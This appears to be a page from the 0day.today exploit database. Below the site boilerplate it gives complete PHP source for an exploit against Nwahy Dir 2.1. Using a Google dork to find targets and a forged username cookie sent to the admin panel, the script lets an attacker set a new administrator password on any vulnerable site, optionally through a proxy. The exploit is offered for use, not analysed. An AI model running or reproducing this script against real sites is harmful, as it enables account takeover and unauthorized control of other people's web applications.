0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Nwahy Dir 2.1 Arbitrary Change Admin Password Exploit
===================================================== Nwahy Dir 2.1 Arbitrary Change Admin Password Exploit ===================================================== <? /* [ Nwahy Dir v2.1 Change Admin Password Exploit ] [-] Author : rEcruit [-] Download : http://nwahy.com/showdownload-3105.html [-] Vuln in ./admincp/admininfo.php [code] $u = addslashes($_COOKIE['username']); $query = mysql_query ("SELECT * FROM `dlil_admin` WHERE username='$u' AND adminoruser='0'") or die ("Query failed"); $counts = mysql_num_rows($query); if($counts == 0){ echo "<div align='center'>......................</div>"; }else{ [/code] [-] Works On : 1. Nwahy Articles v1 2. Nwahy scripts v1 3. Nwahy book v1 [-] Note : Path to Control Panel "/admincp/" . */ error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function Usage() { print "\n\n"; print "/------------------------------------------------------------\\\n"; print "| Nwahy Dir v2.1 Change Admin Password Exploit |\n"; print "\------------------------------------------------------------/\n"; print "| [-] Author : rEcruit |\n"; print "\------------------------------------------------------------/\n"; print "| [-] Dork : Nwahy.com 2.1 , inurl:'add-site.html' |\n"; print "| [+] Usage : php Exploit.php HOST PATH Options |\n"; print "| [-] HOST : Target server (ip/hostname) |\n"; print "| [-] PATH : Path to Nwahy Dir |\n"; print "| [-] Options : |\n"; print "| =>Proxy :(ex. 0.0.0.0:8080) |\n"; print "\------------------------------------------------------------/\n"; print "\n\n"; exit; } function Send() { Global $host,$path,$user,$pwd,$proxy; if(empty($proxy)) { $Connect = @fsockopen($host,"80") or die("[-] Bad Host ."); }else{ $proxy = explode(":",$proxy); $Connect = @fsockopen($proxy[0],$proxy[1]) or die("[-] Bad Proxy ."); } $Payload = "username={$user}&password={$pwd}"; $Packet .= "POST {$path}/admincp/admininfo.php?action=edit HTTP/1.1 \r\n"; $Packet .= "Host: {$host}\r\n"; $Packet .= "Cookie: username={$user}\r\n"; $Packet .= "X-Forwarded-For: 127.0.0.1\r\n"; $Packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $Packet .= "Content-Length: ".(strlen($Payload))."\r\n"; $Packet .= "Connection: close\r\n\r\n"; $Packet .= $Payload; fputs($Connect,$Packet); while(!feof($Connect)) $Response .= @fgets($Connect,2048); fclose($Connect); return $Response; } function Login() { $Response = @Send(); if(eregi("refresh",$Response)) { $msg = "[-] Password changed .\n"; } elseif(eregi("<div align='center'>",$Response)) { $msg = "[-] Bad username .\n"; } else { $msg = "[-] Exploit failed .\n"; } return $msg; } if ($argc < 3) Usage(); $host = $argv[1]; $path = $argv[2];; $proxy = $argv[3]; Print "\r\n[-] Connecting to {$host} .... \r\n"; while(1) { Print "[-] Username: "; if($user = str_replace (" ", "%20", trim(fgets(STDIN)))) { Print "[-] New password: "; if($pwd = str_replace (" ", "%20", trim(fgets(STDIN)))) { Print Login(); exit; } } } //end while ?> # 0day.today [2024-11-16] #